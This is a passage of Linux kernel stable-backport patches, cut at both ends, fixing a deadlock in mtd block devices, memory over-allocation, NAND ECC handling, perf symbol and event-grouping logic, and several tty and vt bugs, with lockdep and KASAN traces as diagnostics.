spin_lock_irqsave(&cm.lock, flags); + if (!cm_id_priv->prim_send_port_not_ready) + av = &cm_id_priv->av; + else if (!cm_id_priv->altr_send_port_not_ready && + (cm_id_priv->alt_av.port)) + av = &cm_id_priv->alt_av; + else { + pr_info("%s: not valid CM id\n", __func__); + ret = -ENODEV; + spin_unlock_irqrestore(&cm.lock, flags); + goto out; + } + spin_unlock_irqrestore(&cm.lock, flags); + /* Make sure the port haven't released the mad yet */ mad_agent = cm_id_priv->av.port->mad_agent; - ah = ib_create_ah(mad_agent->qp->pd, &cm_id_priv->av.ah_attr); - if (IS_ERR(ah)) - return PTR_ERR(ah); + if (!mad_agent) { + pr_info("%s: not a valid MAD agent\n", __func__); + ret = -ENODEV; + goto out; + } + ah = ib_create_ah(mad_agent->qp->pd, &av->ah_attr); + if (IS_ERR(ah)) { + ret = PTR_ERR(ah); + goto out; + } m = ib_create_send_mad(mad_agent, cm_id_priv->id.remote_cm_qpn, - cm_id_priv->av.pkey_index, + av->pkey_index, 0, IB_MGMT_MAD_HDR, IB_MGMT_MAD_DATA, GFP_ATOMIC); if (IS_ERR(m)) { ib_destroy_ah(ah); - return PTR_ERR(m); + ret = PTR_ERR(m); + goto out; } /* Timeout set by caller if response is expected. */ @@ -277,7 +314,10 @@ static int cm_alloc_msg(struct cm_id_private *cm_id_priv, atomic_inc(&cm_id_priv->refcount); m->context[0] = cm_id_priv; *msg = m; - return 0; + +out: + spin_unlock_irqrestore(&cm.state_lock, flags2); + return ret; } static int cm_alloc_response_msg(struct cm_port *port, @@ -346,7 +386,8 @@ static void cm_init_av_for_response(struct cm_port *port, struct ib_wc *wc, grh, &av->ah_attr); } -static int cm_init_av_by_path(struct ib_sa_path_rec *path, struct cm_av *av) +static int cm_init_av_by_path(struct ib_sa_path_rec *path, struct cm_av *av, + struct cm_id_private *cm_id_priv) { struct cm_device *cm_dev; struct cm_port *port = NULL; @@ -376,7 +417,18 @@ static int cm_init_av_by_path(struct ib_sa_path_rec *path, struct cm_av *av) ib_init_ah_from_path(cm_dev->ib_device, port->port_num, path, &av->ah_attr); av->timeout = path->packet_life_time + 1; - return 0; + + spin_lock_irqsave(&cm.lock, flags); + if (&cm_id_priv->av == av) + list_add_tail(&cm_id_priv->prim_list, &port->cm_priv_prim_list); + else if (&cm_id_priv->alt_av == av) + list_add_tail(&cm_id_priv->altr_list, &port->cm_priv_altr_list); + else + ret = -EINVAL; + + spin_unlock_irqrestore(&cm.lock, flags); + + return ret; } static int cm_alloc_id(struct cm_id_private *cm_id_priv) @@ -716,6 +768,8 @@ struct ib_cm_id *ib_create_cm_id(struct ib_device *device, spin_lock_init(&cm_id_priv->lock); init_completion(&cm_id_priv->comp); INIT_LIST_HEAD(&cm_id_priv->work_list); + INIT_LIST_HEAD(&cm_id_priv->prim_list); + INIT_LIST_HEAD(&cm_id_priv->altr_list); atomic_set(&cm_id_priv->work_count, -1); atomic_set(&cm_id_priv->refcount, 1); return &cm_id_priv->id; @@ -914,6 +968,15 @@ retest: break; } + spin_lock_irq(&cm.lock); + if (!list_empty(&cm_id_priv->altr_list) && + (!cm_id_priv->altr_send_port_not_ready)) + list_del(&cm_id_priv->altr_list); + if (!list_empty(&cm_id_priv->prim_list) && + (!cm_id_priv->prim_send_port_not_ready)) + list_del(&cm_id_priv->prim_list); + spin_unlock_irq(&cm.lock); + cm_free_id(cm_id->local_id); cm_deref_id(cm_id_priv); wait_for_completion(&cm_id_priv->comp); @@ -1137,12 +1200,13 @@ int ib_send_cm_req(struct ib_cm_id *cm_id, goto out; } - ret = cm_init_av_by_path(param->primary_path, &cm_id_priv->av); + ret = cm_init_av_by_path(param->primary_path, &cm_id_priv->av, + cm_id_priv); if (ret) goto error1; if (param->alternate_path) { ret = cm_init_av_by_path(param->alternate_path, - &cm_id_priv->alt_av); + &cm_id_priv->alt_av, cm_id_priv); if (ret) goto error1; } @@ -1562,7 +1626,8 @@ static int cm_req_handler(struct cm_work *work) cm_process_routed_req(req_msg, work->mad_recv_wc->wc); cm_format_paths_from_req(req_msg, &work->path[0], &work->path[1]); - ret = cm_init_av_by_path(&work->path[0], &cm_id_priv->av); + ret = cm_init_av_by_path(&work->path[0], &cm_id_priv->av, + cm_id_priv); if (ret) { ib_get_cached_gid(work->port->cm_dev->ib_device, work->port->port_num, 0, &work->path[0].sgid); @@ -1572,7 +1637,8 @@ static int cm_req_handler(struct cm_work *work) goto rejected; } if (req_msg->alt_local_lid) { - ret = cm_init_av_by_path(&work->path[1], &cm_id_priv->alt_av); + ret = cm_init_av_by_path(&work->path[1], &cm_id_priv->alt_av, + cm_id_priv); if (ret) { ib_send_cm_rej(cm_id, IB_CM_REJ_INVALID_ALT_GID, &work->path[0].sgid, @@ -2627,7 +2693,8 @@ int ib_send_cm_lap(struct ib_cm_id *cm_id, goto out; } - ret = cm_init_av_by_path(alternate_path, &cm_id_priv->alt_av); + ret = cm_init_av_by_path(alternate_path, &cm_id_priv->alt_av, + cm_id_priv); if (ret) goto out; cm_id_priv->alt_av.timeout = @@ -2739,7 +2806,8 @@ static int cm_lap_handler(struct cm_work *work) cm_init_av_for_response(work->port, work->mad_recv_wc->wc, work->mad_recv_wc->recv_buf.grh, &cm_id_priv->av); - cm_init_av_by_path(param->alternate_path, &cm_id_priv->alt_av); + cm_init_av_by_path(param->alternate_path, &cm_id_priv->alt_av, + cm_id_priv); ret = atomic_inc_and_test(&cm_id_priv->work_count); if (!ret) list_add_tail(&work->list, &cm_id_priv->work_list); @@ -2931,7 +2999,7 @@ int ib_send_cm_sidr_req(struct ib_cm_id *cm_id, return -EINVAL; cm_id_priv = container_of(cm_id, struct cm_id_private, id); - ret = cm_init_av_by_path(param->path, &cm_id_priv->av); + ret = cm_init_av_by_path(param->path, &cm_id_priv->av, cm_id_priv); if (ret) goto out; @@ -3352,7 +3420,9 @@ out: static int cm_migrate(struct ib_cm_id *cm_id) { struct cm_id_private *cm_id_priv; + struct cm_av tmp_av; unsigned long flags; + int tmp_send_port_not_ready; int ret = 0; cm_id_priv = container_of(cm_id, struct cm_id_private, id); @@ -3361,7 +3431,14 @@ static int cm_migrate(struct ib_cm_id *cm_id) (cm_id->lap_state == IB_CM_LAP_UNINIT || cm_id->lap_state == IB_CM_LAP_IDLE)) { cm_id->lap_state = IB_CM_LAP_IDLE; + /* Swap address vector */ + tmp_av = cm_id_priv->av; cm_id_priv->av = cm_id_priv->alt_av; + cm_id_priv->alt_av = tmp_av; + /* Swap port send ready state */ + tmp_send_port_not_ready = cm_id_priv->prim_send_port_not_ready; + cm_id_priv->prim_send_port_not_ready = cm_id_priv->altr_send_port_not_ready; + cm_id_priv->altr_send_port_not_ready = tmp_send_port_not_ready; } else ret = -EINVAL; spin_unlock_irqrestore(&cm_id_priv->lock, flags); @@ -3767,6 +3844,9 @@ static void cm_add_one(struct ib_device *ib_device) port->cm_dev = cm_dev; port->port_num = i; + INIT_LIST_HEAD(&port->cm_priv_prim_list); + INIT_LIST_HEAD(&port->cm_priv_altr_list); + ret = cm_create_port_fs(port); if (ret) goto error1; @@ -3813,6 +3893,8 @@ static void cm_remove_one(struct ib_device *ib_device) { struct cm_device *cm_dev; struct cm_port *port; + struct cm_id_private *cm_id_priv; + struct ib_mad_agent *cur_mad_agent; struct ib_port_modify port_modify = { .clr_port_cap_mask = IB_PORT_CM_SUP }; @@ -3830,10 +3912,22 @@ static void cm_remove_one(struct ib_device *ib_device) for (i = 1; i <= ib_device->phys_port_cnt; i++) { port = cm_dev->port[i-1]; ib_modify_port(ib_device, port->port_num, 0, &port_modify); - ib_unregister_mad_agent(port->mad_agent); + /* Mark all the cm_id's as not valid */ + spin_lock_irq(&cm.lock); + list_for_each_entry(cm_id_priv, &port->cm_priv_altr_list, altr_list) + cm_id_priv->altr_send_port_not_ready = 1; + list_for_each_entry(cm_id_priv, &port->cm_priv_prim_list, prim_list) + cm_id_priv->prim_send_port_not_ready = 1; + spin_unlock_irq(&cm.lock); flush_workqueue(cm.wq); + spin_lock_irq(&cm.state_lock); + cur_mad_agent = port->mad_agent; + port->mad_agent = NULL; + spin_unlock_irq(&cm.state_lock); + ib_unregister_mad_agent(cur_mad_agent); cm_remove_port_fs(port); } + device_unregister(cm_dev->device); kfree(cm_dev); } @@ -3846,6 +3940,7 @@ static int __init ib_cm_init(void) INIT_LIST_HEAD(&cm.device_list); rwlock_init(&cm.device_lock); spin_lock_init(&cm.lock); + spin_lock_init(&cm.state_lock); cm.listen_service_table = RB_ROOT; cm.listen_service_id = be64_to_cpu(IB_CM_ASSIGN_SERVICE_ID); cm.remote_id_table = RB_ROOT; From bdd7043be1803d359b58fde36a458ee57db25d58 Mon Sep 17 00:00:00 2001 From: Brian Norris Date: Mon, 26 Oct 2015 10:20:23 -0700 Subject: [PATCH 209/315] mtd: blkdevs: fix potential deadlock + lockdep warnings commit f3c63795e90f0c6238306883b6c72f14d5355721 upstream. Commit 073db4a51ee4 ("mtd: fix: avoid race condition when accessing mtd->usecount") fixed a race condition but due to poor ordering of the mutex acquisition, introduced a potential deadlock. The deadlock can occur, for example, when rmmod'ing the m25p80 module, which will delete one or more MTDs, along with any corresponding mtdblock devices. This could potentially race with an acquisition of the block device as follows. -> blktrans_open() -> mutex_lock(&dev->lock); -> mutex_lock(&mtd_table_mutex); -> del_mtd_device() -> mutex_lock(&mtd_table_mutex); -> blktrans_notify_remove() -> del_mtd_blktrans_dev() -> mutex_lock(&dev->lock); This is a classic (potential) ABBA deadlock, which can be fixed by making the A->B ordering consistent everywhere. There was no real purpose to the ordering in the original patch, AFAIR, so this shouldn't be a problem. This ordering was actually already present in del_mtd_blktrans_dev(), for one, where the function tried to ensure that its caller already held mtd_table_mutex before it acquired &dev->lock: if (mutex_trylock(&mtd_table_mutex)) { mutex_unlock(&mtd_table_mutex); BUG(); } So, reverse the ordering of acquisition of &dev->lock and &mtd_table_mutex so we always acquire mtd_table_mutex first. Snippets of the lockdep output follow: # modprobe -r m25p80 [ 53.419251] [ 53.420838] ====================================================== [ 53.427300] [ INFO: possible circular locking dependency detected ] [ 53.433865] 4.3.0-rc6 #96 Not tainted [ 53.437686] ------------------------------------------------------- [ 53.444220] modprobe/372 is trying to acquire lock: [ 53.449320] (&new->lock){+.+...}, at: [] del_mtd_blktrans_dev+0x80/0xdc [ 53.457271] [ 53.457271] but task is already holding lock: [ 53.463372] (mtd_table_mutex){+.+.+.}, at: [] del_mtd_device+0x18/0x100 [ 53.471321] [ 53.471321] which lock already depends on the new lock. [ 53.471321] [ 53.479856] [ 53.479856] the existing dependency chain (in reverse order) is: [ 53.487660] -> #1 (mtd_table_mutex){+.+.+.}: [ 53.492331] [] blktrans_open+0x34/0x1a4 [ 53.497879] [] __blkdev_get+0xc4/0x3b0 [ 53.503364] [] blkdev_get+0x108/0x320 [ 53.508743] [] do_dentry_open+0x218/0x314 [ 53.514496] [] path_openat+0x4c0/0xf9c [ 53.519959] [] do_filp_open+0x5c/0xc0 [ 53.525336] [] do_sys_open+0xfc/0x1cc [ 53.530716] [] ret_fast_syscall+0x0/0x1c [ 53.536375] -> #0 (&new->lock){+.+...}: [ 53.540587] [] mutex_lock_nested+0x38/0x3cc [ 53.546504] [] del_mtd_blktrans_dev+0x80/0xdc [ 53.552606] [] blktrans_notify_remove+0x7c/0x84 [ 53.558891] [] del_mtd_device+0x74/0x100 [ 53.564544] [] del_mtd_partitions+0x80/0xc8 [ 53.570451] [] mtd_device_unregister+0x24/0x48 [ 53.576637] [] spi_drv_remove+0x1c/0x34 [ 53.582207] [] __device_release_driver+0x88/0x114 [ 53.588663] [] device_release_driver+0x20/0x2c [ 53.594843] [] bus_remove_device+0xd8/0x108 [ 53.600748] [] device_del+0x10c/0x210 [ 53.606127] [] device_unregister+0xc/0x20 [ 53.611849] [] __unregister+0x10/0x20 [ 53.617211] [] device_for_each_child+0x50/0x7c [ 53.623387] [] spi_unregister_master+0x58/0x8c [ 53.629578] [] release_nodes+0x15c/0x1c8 [ 53.635223] [] __device_release_driver+0x90/0x114 [ 53.641689] [] driver_detach+0xb4/0xb8 [ 53.647147] [] bus_remove_driver+0x4c/0xa0 [ 53.652970] [] SyS_delete_module+0x11c/0x1e4 [ 53.658976] [] ret_fast_syscall+0x0/0x1c [ 53.664621] [ 53.664621] other info that might help us debug this: [ 53.664621] [ 53.672979] Possible unsafe locking scenario: [ 53.672979] [ 53.679169] CPU0 CPU1 [ 53.683900] ---- ---- [ 53.688633] lock(mtd_table_mutex); [ 53.692383] lock(&new->lock); [ 53.698306] lock(mtd_table_mutex); [ 53.704658] lock(&new->lock); [ 53.707946] [ 53.707946] *** DEADLOCK *** Fixes: 073db4a51ee4 ("mtd: fix: avoid race condition when accessing mtd->usecount") Reported-by: Felipe Balbi Tested-by: Felipe Balbi Signed-off-by: Brian Norris Signed-off-by: Willy Tarreau --- drivers/mtd/mtd_blkdevs.c | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/drivers/mtd/mtd_blkdevs.c b/drivers/mtd/mtd_blkdevs.c index 32d5e40c686..48b63e84906 100644 --- a/drivers/mtd/mtd_blkdevs.c +++ b/drivers/mtd/mtd_blkdevs.c @@ -198,8 +198,8 @@ static int blktrans_open(struct block_device *bdev, fmode_t mode) if (!dev) return -ERESTARTSYS; /* FIXME: busy loop! -arnd*/ - mutex_lock(&dev->lock); mutex_lock(&mtd_table_mutex); + mutex_lock(&dev->lock); if (dev->open) goto unlock; @@ -223,8 +223,8 @@ static int blktrans_open(struct block_device *bdev, fmode_t mode) unlock: dev->open++; - mutex_unlock(&mtd_table_mutex); mutex_unlock(&dev->lock); + mutex_unlock(&mtd_table_mutex); blktrans_dev_put(dev); return ret; @@ -234,8 +234,8 @@ error_release: error_put: module_put(dev->tr->owner); kref_put(&dev->ref, blktrans_dev_release); - mutex_unlock(&mtd_table_mutex); mutex_unlock(&dev->lock); + mutex_unlock(&mtd_table_mutex); blktrans_dev_put(dev); return ret; } @@ -247,8 +247,8 @@ static void blktrans_release(struct gendisk *disk, fmode_t mode) if (!dev) return; - mutex_lock(&dev->lock); mutex_lock(&mtd_table_mutex); + mutex_lock(&dev->lock); if (--dev->open) goto unlock; @@ -262,8 +262,8 @@ static void blktrans_release(struct gendisk *disk, fmode_t mode) __put_mtd_device(dev->mtd); } unlock: - mutex_unlock(&mtd_table_mutex); mutex_unlock(&dev->lock); + mutex_unlock(&mtd_table_mutex); blktrans_dev_put(dev); } From 1b47a57fb8548106181a83f5001d930888b75129 Mon Sep 17 00:00:00 2001 From: Dan Carpenter Date: Thu, 14 Jul 2016 13:44:56 +0300 Subject: [PATCH 210/315] mtd: pmcmsp-flash: Allocating too much in init_msp_flash() commit 79ad07d45743721010e766e65dc004ad249bd429 upstream. There is a cut and paste issue here. The bug is that we are allocating more memory than necessary for msp_maps. We should be allocating enough space for a map_info struct (144 bytes) but we instead allocate enough for an mtd_info struct (1840 bytes). It's a small waste. The other part of this is not harmful but when we allocated msp_flash then we allocated enough space fro a map_info pointer instead of an mtd_info pointer. But since pointers are the same size it works out fine. Anyway, I decided to clean up all three allocations a bit to make them a bit more consistent and clear. Fixes: 68aa0fa87f6d ('[MTD] PMC MSP71xx flash/rootfs mappings') Signed-off-by: Dan Carpenter Signed-off-by: Brian Norris Signed-off-by: Willy Tarreau --- drivers/mtd/maps/pmcmsp-flash.c | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/drivers/mtd/maps/pmcmsp-flash.c b/drivers/mtd/maps/pmcmsp-flash.c index 744ca5cacc9..f9fa3fad728 100644 --- a/drivers/mtd/maps/pmcmsp-flash.c +++ b/drivers/mtd/maps/pmcmsp-flash.c @@ -75,15 +75,15 @@ static int __init init_msp_flash(void) printk(KERN_NOTICE "Found %d PMC flash devices\n", fcnt); - msp_flash = kmalloc(fcnt * sizeof(struct map_info *), GFP_KERNEL); + msp_flash = kcalloc(fcnt, sizeof(*msp_flash), GFP_KERNEL); if (!msp_flash) return -ENOMEM; - msp_parts = kmalloc(fcnt * sizeof(struct mtd_partition *), GFP_KERNEL); + msp_parts = kcalloc(fcnt, sizeof(*msp_parts), GFP_KERNEL); if (!msp_parts) goto free_msp_flash; - msp_maps = kcalloc(fcnt, sizeof(struct mtd_info), GFP_KERNEL); + msp_maps = kcalloc(fcnt, sizeof(*msp_maps), GFP_KERNEL); if (!msp_maps) goto free_msp_parts; From 44e3b0c77781b1cf42dc3c9fbdeb753137980ee3 Mon Sep 17 00:00:00 2001 From: Karl Beldan Date: Mon, 29 Aug 2016 07:45:49 +0000 Subject: [PATCH 211/315] mtd: nand: davinci: Reinitialize the HW ECC engine in 4bit hwctl commit f6d7c1b5598b6407c3f1da795dd54acf99c1990c upstream. This fixes subpage writes when using 4-bit HW ECC. There has been numerous reports about ECC errors with devices using this driver for a while. Also the 4-bit ECC has been reported as broken with subpages in [1] and with 16 bits NANDs in the driver and in mach* board files both in mainline and in the vendor BSPs. What I saw with 4-bit ECC on a 16bits NAND (on an LCDK) which got me to try reinitializing the ECC engine: - R/W on whole pages properly generates/checks RS code - try writing the 1st subpage only of a blank page, the subpage is well written and the RS code properly generated, re-reading the same page the HW detects some ECC error, reading the same page again no ECC error is detected Note that the ECC engine is already reinitialized in the 1-bit case. Tested on my LCDK with UBI+UBIFS using subpages. This could potentially get rid of the issue workarounded in [1]. [1] 28c015a9daab ("mtd: davinci-nand: disable subpage write for keystone-nand") Fixes: 6a4123e581b3 ("mtd: nand: davinci_nand, 4-bit ECC for smallpage") Signed-off-by: Karl Beldan Acked-by: Boris Brezillon Signed-off-by: Brian Norris Signed-off-by: Willy Tarreau --- drivers/mtd/nand/davinci_nand.c | 3 +++ 1 file changed, 3 insertions(+) diff --git a/drivers/mtd/nand/davinci_nand.c b/drivers/mtd/nand/davinci_nand.c index c3e15a55817..e4f16cf413a 100644 --- a/drivers/mtd/nand/davinci_nand.c +++ b/drivers/mtd/nand/davinci_nand.c @@ -241,6 +241,9 @@ static void nand_davinci_hwctl_4bit(struct mtd_info *mtd, int mode) unsigned long flags; u32 val; + /* Reset ECC hardware */ + davinci_nand_readl(info, NAND_4BIT_ECC1_OFFSET); + spin_lock_irqsave(&davinci_nand_lock, flags); /* Start 4-bit ECC calculation for read/write */ From d636f64a48d5b1fe3d9b41e3b907a95fe7926e03 Mon Sep 17 00:00:00 2001 From: Arnaldo Carvalho de Melo Date: Thu, 1 Sep 2016 11:00:23 -0300 Subject: [PATCH 212/315] perf symbols: Fixup symbol sizes before picking best ones commit 432746f8e0b6a82ba832b771afe31abd51af6752 upstream. When we call symbol__fixup_duplicate() we use algorithms to pick the "best" symbols for cases where there are various functions/aliases to an address, and those check zero size symbols, which, before calling symbol__fixup_end() are _all_ symbols in a just parsed kallsyms file. So first fixup the end, then fixup the duplicates. Found while trying to figure out why 'perf test vmlinux' failed, see the output of 'perf test -v vmlinux' to see cases where the symbols picked as best for vmlinux don't match the ones picked for kallsyms. Cc: Anton Blanchard Cc: Adrian Hunter Cc: David Ahern Cc: Jiri Olsa Cc: Masami Hiramatsu Cc: Namhyung Kim Cc: Wang Nan Fixes: 694bf407b061 ("perf symbols: Add some heuristics for choosing the best duplicate symbol") Link: http://lkml.kernel.org/n/tip-rxqvdgr0mqjdxee0kf8i2ufn@git.kernel.org Signed-off-by: Arnaldo Carvalho de Melo Signed-off-by: Willy Tarreau --- tools/perf/util/symbol-elf.c | 2 +- tools/perf/util/symbol.c | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/tools/perf/util/symbol-elf.c b/tools/perf/util/symbol-elf.c index 4b12bf85032..f7718c8fc93 100644 --- a/tools/perf/util/symbol-elf.c +++ b/tools/perf/util/symbol-elf.c @@ -831,8 +831,8 @@ new_symbol: * For misannotated, zeroed, ASM function sizes. */ if (nr > 0) { - symbols__fixup_duplicate(&dso->symbols[map->type]); symbols__fixup_end(&dso->symbols[map->type]); + symbols__fixup_duplicate(&dso->symbols[map->type]); if (kmap) { /* * We need to fixup this here too because we create new diff --git a/tools/perf/util/symbol.c b/tools/perf/util/symbol.c index 8cf3b5426a9..a2fe760605e 100644 --- a/tools/perf/util/symbol.c +++ b/tools/perf/util/symbol.c @@ -673,8 +673,8 @@ int dso__load_kallsyms(struct dso *dso, const char *filename, if (dso__load_all_kallsyms(dso, filename, map) < 0) return -1; - symbols__fixup_duplicate(&dso->symbols[map->type]); symbols__fixup_end(&dso->symbols[map->type]); + symbols__fixup_duplicate(&dso->symbols[map->type]); if (dso->kernel == DSO_TYPE_GUEST_KERNEL) dso->symtab_type = DSO_BINARY_TYPE__GUEST_KALLSYMS; From ac74acf2bda7289a5b076407b29f3a075aec830c Mon Sep 17 00:00:00 2001 From: Peter Zijlstra Date: Fri, 23 Jan 2015 11:19:48 +0100 Subject: [PATCH 213/315] perf: Tighten (and fix) the grouping condition commit c3c87e770458aa004bd7ed3f29945ff436fd6511 upstream. The fix from 9fc81d87420d ("perf: Fix events installation during moving group") was incomplete in that it failed to recognise that creating a group with events for different CPUs is semantically broken -- they cannot be co-scheduled. Furthermore, it leads to real breakage where, when we create an event for CPU Y and then migrate it to form a group on CPU X, the code gets confused where the counter is programmed -- triggered in practice as well by me via the perf fuzzer. Fix this by tightening the rules for creating groups. Only allow grouping of counters that can be co-scheduled in the same context. This means for the same task and/or the same cpu. Fixes: 9fc81d87420d ("perf: Fix events installation during moving group") Signed-off-by: Peter Zijlstra (Intel) Cc: Arnaldo Carvalho de Melo Cc: Jiri Olsa Cc: Linus Torvalds Link: http://lkml.kernel.org/r/20150123125834.090683288@infradead.org Signed-off-by: Ingo Molnar Signed-off-by: Willy Tarreau --- include/linux/perf_event.h | 6 ------ kernel/events/core.c | 15 +++++++++++++-- 2 files changed, 13 insertions(+), 8 deletions(-) diff --git a/include/linux/perf_event.h b/include/linux/perf_event.h index 229a757e1c1..3204422317e 100644 --- a/include/linux/perf_event.h +++ b/include/linux/perf_event.h @@ -430,11 +430,6 @@ struct perf_event { #endif /* CONFIG_PERF_EVENTS */ }; -enum perf_event_context_type { - task_context, - cpu_context, -}; - /** * struct perf_event_context - event context structure * @@ -442,7 +437,6 @@ enum perf_event_context_type { */ struct perf_event_context { struct pmu *pmu; - enum perf_event_context_type type; /* * Protect the states of the events in the list, * nr_active, and the list: diff --git a/kernel/events/core.c b/kernel/events/core.c index 0f520783967..76e26b8e4e4 100644 --- a/kernel/events/core.c +++ b/kernel/events/core.c @@ -6249,7 +6249,6 @@ skip_type: __perf_event_init_context(&cpuctx->ctx); lockdep_set_class(&cpuctx->ctx.mutex, &cpuctx_mutex); lockdep_set_class(&cpuctx->ctx.lock, &cpuctx_lock); - cpuctx->ctx.type = cpu_context; cpuctx->ctx.pmu = pmu; cpuctx->jiffies_interval = 1; INIT_LIST_HEAD(&cpuctx->rotation_list); @@ -6856,7 +6855,19 @@ SYSCALL_DEFINE5(perf_event_open, * task or CPU context: */ if (move_group) { - if (group_leader->ctx->type != ctx->type) + /* + * Make sure we're both on the same task, or both + * per-cpu events. + */ + if (group_leader->ctx->task != ctx->task) + goto err_context; + + /* + * Make sure we're both events for the same CPU; + * grouping events for different CPUs is broken; since + * you can never concurrently schedule them anyhow. + */ + if (group_leader->cpu != event->cpu) goto err_context; } else { if (group_leader->ctx != ctx) From 67de5f0a4a9a3c9eb6597c20b20f4e69a47e47b6 Mon Sep 17 00:00:00 2001 From: Peter Hurley Date: Fri, 27 Nov 2015 14:30:21 -0500 Subject: [PATCH 214/315] tty: Prevent ldisc drivers from re-using stale tty fields commit dd42bf1197144ede075a9d4793123f7689e164bc upstream. Line discipline drivers may mistakenly misuse ldisc-related fields when initializing. For example, a failure to initialize tty->receive_room in the N_GIGASET_M101 line discipline was recently found and fixed [1]. Now, the N_X25 line discipline has been discovered accessing the previous line discipline's already-freed private data [2]. Harden the ldisc interface against misuse by initializing revelant tty fields before instancing the new line discipline. [1] commit fd98e9419d8d622a4de91f76b306af6aa627aa9c Author: Tilman Schmidt Date: Tue Jul 14 00:37:13 2015 +0200 isdn/gigaset: reset tty->receive_room when attaching ser_gigaset [2] Report from Sasha Levin [ 634.336761] ================================================================== [ 634.338226] BUG: KASAN: use-after-free in x25_asy_open_tty+0x13d/0x490 at addr ffff8800a743efd0 [ 634.339558] Read of size 4 by task syzkaller_execu/8981 [ 634.340359] ============================================================================= [ 634.341598] BUG kmalloc-512 (Not tainted): kasan: bad access detected ... [ 634.405018] Call Trace: [ 634.405277] dump_stack (lib/dump_stack.c:52) [ 634.405775] print_trailer (mm/slub.c:655) [ 634.406361] object_err (mm/slub.c:662) [ 634.406824] kasan_report_error (mm/kasan/report.c:138 mm/kasan/report.c:236) [ 634.409581] __asan_report_load4_noabort (mm/kasan/report.c:279) [ 634.411355] x25_asy_open_tty (drivers/net/wan/x25_asy.c:559 (discriminator 1)) [ 634.413997] tty_ldisc_open.isra.2 (drivers/tty/tty_ldisc.c:447) [ 634.414549] tty_set_ldisc (drivers/tty/tty_ldisc.c:567) [ 634.415057] tty_ioctl (drivers/tty/tty_io.c:2646 drivers/tty/tty_io.c:2879) [ 634.423524] do_vfs_ioctl (fs/ioctl.c:43 fs/ioctl.c:607) [ 634.427491] SyS_ioctl (fs/ioctl.c:622 fs/ioctl.c:613) [ 634.427945] entry_SYSCALL_64_fastpath (arch/x86/entry/entry_64.S:188) Cc: Tilman Schmidt Cc: Sasha Levin Signed-off-by: Peter Hurley Signed-off-by: Greg Kroah-Hartman [wt: adjust context] Signed-off-by: Willy Tarreau --- drivers/tty/tty_ldisc.c | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/drivers/tty/tty_ldisc.c b/drivers/tty/tty_ldisc.c index 1afe192bef6..b5cbe12e281 100644 --- a/drivers/tty/tty_ldisc.c +++ b/drivers/tty/tty_ldisc.c @@ -400,6 +400,10 @@ EXPORT_SYMBOL_GPL(tty_ldisc_flush); * they are not on hot paths so a little discipline won't do * any harm. * + * The line discipline-related tty_struct fields are reset to + * prevent the ldisc driver from re-using stale information for + * the new ldisc instance. + * * Locking: takes termios_mutex */ @@ -408,6 +412,9 @@ static void tty_set_termios_ldisc(struct tty_struct *tty, int num) mutex_lock(&tty->termios_mutex); tty->termios.c_line = num; mutex_unlock(&tty->termios_mutex); + + tty->disc_data = NULL; + tty->receive_room = 0; } /** From 350594012a219713e7ad990669c660b29bad2ab2 Mon Sep 17 00:00:00 2001 From: Dmitry Vyukov Date: Fri, 14 Oct 2016 15:18:28 +0200 Subject: [PATCH 215/315] tty: limit terminal size to 4M chars commit 32b2921e6a7461fe63b71217067a6cf4bddb132f upstream. Size of kmalloc() in vc_do_resize() is controlled by user. Too large kmalloc() size triggers WARNING message on console. Put a reasonable upper bound on terminal size to prevent WARNINGs. Signed-off-by: Dmitry Vyukov CC: David Rientjes Cc: One Thousand Gnomes Cc: Greg Kroah-Hartman Cc: Jiri Slaby Cc: Peter Hurley Cc: linux-kernel@vger.kernel.org Cc: syzkaller@googlegroups.com Signed-off-by: Greg Kroah-Hartman Signed-off-by: Willy Tarreau --- drivers/tty/vt/vt.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/drivers/tty/vt/vt.c b/drivers/tty/vt/vt.c index 6dff194751f..ee51acdc674 100644 --- a/drivers/tty/vt/vt.c +++ b/drivers/tty/vt/vt.c @@ -863,6 +863,8 @@ static int vc_do_resize(struct tty_struct *tty, struct vc_data *vc, if (new_cols == vc->vc_cols && new_rows == vc->vc_rows) return 0; + if (new_screen_size > (4 << 20)) + return -EINVAL; newscreen = kmalloc(new_screen_size, GFP_USER); if (!newscreen) return -ENOMEM; From 902fd8d597f6cec01c7d24da38e0a921fdbc6382 Mon Sep 17 00:00:00 2001 From: Jiri Slaby Date: Mon, 3 Oct 2016 11:00:17 +0200 Subject: [PATCH 216/315] tty: vt, fix bogus division in csi_J MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit commit 42acfc6615f47e465731c263bee0c799edb098f2 upstream. In csi_J(3), the third parameter of scr_memsetw (vc_screenbuf_size) is divided by 2 inappropriatelly. But scr_memsetw expects size, not count, because it divides the size by 2 on its own before doing actual memset-by-words. So remove the bogus division. Signed-off-by: Jiri Slaby Cc: Petr Písař Fixes: f8df13e0a9 (tty: Clean console safely) Signed-off-by: Greg Kroah-Hartman Signed-off-by: Willy Tarreau --- drivers/tty/vt/vt.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/tty/vt/vt.c b/drivers/tty/vt/vt.c index ee51acdc674..5deddca84a2 100644 --- a/drivers/tty/vt/vt.c +++ b/drivers/tty/vt/vt.c @@ -1166,7 +1166,7 @@ static void csi_J(struct vc_data *vc, int vpar) break; case 3: /* erase scroll-back buffer (and whole display) */ scr_memsetw(vc->vc_screenbuf, vc->vc_video_erase_char, - vc->vc_screenbuf_size >> 1); + vc->vc_screenbuf_size); set_origin(vc); if (CON_IS_VISIBLE(vc)) update_screen(vc); From 5812a9bc9d68a82c2cc839f88e6f7a05093ab39d Mon Sep 17 00:00:00 2001 From: Scot Doyle Date: Thu, 13 Oct 2016 12:12:43 -0500 Subject: [PATCH 217/315] vt: clear selection before resizing commit 009e39ae44f4191188aeb6dfbf661b771dbbe515 upstream. When resizing a vt its selection may exceed the new size, resulting in an invalid memory access [1]. Clear the selection before resizing. [1] http://lkml.kernel.org/r/CACT4Y+acDTwy4umEvf5ROBGiRJNrxHN4Cn5szCXE5Jw-d1B=Xw@mail.gmail.com Reported-and-tested-by: Dmitry Vyukov Signed-off-by: Scot Doyle Signed-off-by: Willy Tarreau --- drivers/tty/vt/vt.c | 3 +++ 1 file changed, 3 insertions(+) diff --git a/drivers/tty/vt/vt.c 